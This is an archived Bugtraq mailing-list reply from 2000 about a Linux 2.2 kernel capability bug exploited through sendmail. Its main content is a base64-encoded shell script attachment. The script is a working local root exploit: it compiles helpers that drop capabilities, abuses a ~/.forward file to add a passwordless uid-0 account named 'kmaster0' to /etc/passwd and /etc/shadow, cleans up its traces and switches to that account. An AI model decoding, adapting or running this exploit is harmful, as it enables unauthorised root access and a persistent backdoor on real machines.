[15272] in bugtraq
Re: Sendmail local root exploit on linux 2.2.x
daemon@ATHENA.MIT.EDU (Christophe GRENIER)
Fri Jun 9 23:43:46 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="969041865-1426321146-960500952=:21915"
Message-Id: <Pine.LNX.4.21.0006082348200.21915-101000@nef.esiea.fr>
Date: Thu, 8 Jun 2000 23:49:12 +0200
Reply-To: Christophe GRENIER <grenier@NEF.ESIEA.FR>
From: Christophe GRENIER <grenier@NEF.ESIEA.FR>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <393F8FDC.882BAEE5@real-linux.de>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--969041865-1426321146-960500952=:21915
Content-Type: TEXT/PLAIN; charset=US-ASCII
A little script to exploit this bug...
-------------------------------------------------------------------------------
,-~~-.___. ._. -= GRENIER Christophe =-
/ | ' \ | |"""""""""| sysadm de nef.esiea.fr
( ) 0 | | | ESIEA
\_/-, ,----' | | | Ecole Superieure d'Informatique -
==== !_!--v---v--" Electronique - Automatique
/ \-'~; |""""""""|
/ __/~| ._-""|| | Email: grenier@esiea.fr
=( _____|_|____||________| http://www.esiea.fr/public_html/Christophe.GRENIER/
-------------------------------------------------------------------------------
--969041865-1426321146-960500952=:21915
Content-Type: APPLICATION/x-sh; name="bug_kernel.sh"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0006082349120.21915@nef.esiea.fr>
Content-Description:
Content-Disposition: attachment; filename="bug_kernel.sh"
IyEvYmluL3NoCmVjaG8gRXhwbG9pdCBmb3IgY2FwYWJpbGl0eSBidWcgdXNp
bmcgc2VuZG1haWwKZWNobyA4IGp1bmUgMjAwMCAtIENocmlzdG9waGUgR1JF
TklFUgplY2hvIGdyZW5pZXJAbmVmLmVzaWVhLmZyCmVjaG8gaHR0cDovL3d3
dy5lc2llYS5mci9wdWJsaWNfaHRtbC9DaHJpc3RvcGhlLkdSRU5JRVIKZWNo
bwpleHBvcnQgQklORElSPSRIT01FCmNhdCA+IGFkZC5jIDw8RU9GCiNpbmNs
dWRlIDxmY250bC5oPgojaW5jbHVkZSA8dW5pc3RkLmg+CgppbnQgbWFpbiAo
dm9pZCkKewogIGludCBmZDsKICBjaGFyIHN0cmluZ1s0MF07CiAgc2V0ZXVp
ZCgwKTsKICBjaG1vZCgiL2V0Yy9wYXNzd2QiLDA2NDQpOwogIGZkID0gb3Bl
bigiL2V0Yy9wYXNzd2QiLCBPX0FQUEVORHxPX1dST05MWSk7CiAgaWYoZmQ+
MCkKICB7CiAgICBzdHJjcHkoc3RyaW5nLCAia21hc3RlcjA6eDowOjA6Oi9y
b290Oi9iaW4vc2hcbiIpOwogICAgd3JpdGUoZmQsIHN0cmluZywgc3RybGVu
KHN0cmluZykpOwogICAgY2xvc2UoZmQpOwogIH0KICBjaG1vZCgiL2V0Yy9z
aGFkb3ciLDA2MDApOwogIGZkID0gb3BlbigiL2V0Yy9zaGFkb3ciLCBPX0FQ
UEVORHxPX1dST05MWSk7CiAgaWYoZmQ+MCkKICB7CiAgICBzdHJjcHkoc3Ry
aW5nLCAia21hc3RlcjA6OjExMDI5OjA6OTk5OTk6Nzo6OiIpOwogICAgd3Jp
dGUoZmQsIHN0cmluZywgc3RybGVuKHN0cmluZykpOwogICAgZmNobW9kKGZk
LDA0MDApOwogICAgY2xvc2UoZmQpOwogIH0KICByZXR1cm4gMDsKfQpFT0YK
Y2F0ID4gZXguYyA8PEVPRgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRl
IDx1bmlzdGQuaD4KI2luY2x1ZGUgPGxpbnV4L2NhcGFiaWxpdHkuaD4KCmlu
dCBtYWluICh2b2lkKQp7CiAgY2FwX3VzZXJfaGVhZGVyX3QgaGVhZGVyOwog
IGNhcF91c2VyX2RhdGFfdCBkYXRhOwogIGhlYWRlciA9IG1hbGxvYyg4KTsK
ICBkYXRhID0gbWFsbG9jKDEyKTsKICBoZWFkZXItPnBpZCA9IDA7CiAgaGVh
ZGVyLT52ZXJzaW9uID0gX0xJTlVYX0NBUEFCSUxJVFlfVkVSU0lPTjsKICBk
YXRhLT5pbmhlcml0YWJsZSA9IGRhdGEtPmVmZmVjdGl2ZSA9IGRhdGEtPnBl
cm1pdHRlZCA9IDA7CiAgY2Fwc2V0KGhlYWRlciwgZGF0YSk7CiAgZXhlY2xw
KCIvdXNyL3NiaW4vc2VuZG1haWwiLCAic2VuZG1haWwiLCAiLXQiLCBOVUxM
KTsKICByZXR1cm4gMDsKfQpFT0YKZ2NjIC1vICRCSU5ESVIvYWRkIGFkZC5j
CmdjYyAtbyBleCBleC5jCmNobW9kIDc1NSAkQklORElSL2FkZApjaG1vZCA3
MTEgJEJJTkRJUgpjYXQgPiBtYWlsLm1zZyA8PCBFT0YKRnJvbTogJFVTRVIK
VG86ICRVU0VSClN1YmplY3Q6IGV4cGxvaXQKcGlwbwpFT0YKZWNobyAiXCJ8
ZXhlYyAkQklORElSL2FkZCB8fCBleGl0IDc1ICNHUkVOSUVSXCIiID4gfi8u
Zm9yd2FyZApjaG1vZCA2MDAgfi8uZm9yd2FyZAouL2V4IDwgbWFpbC5tc2cK
ZWNobyBXYWl0aW5nIGEgbGl0dGxlIGJpdC4uLgpzbGVlcCAzCmVjaG8gQ2xl
YW5pbmcKcm0gLWYgbWFpbCBleCBleC5jICRCSU5ESVIvYWRkIGFkZC5jIH4v
LmZvcndhcmQKc3UgLSBrbWFzdGVyMAo=
--969041865-1426321146-960500952=:21915--
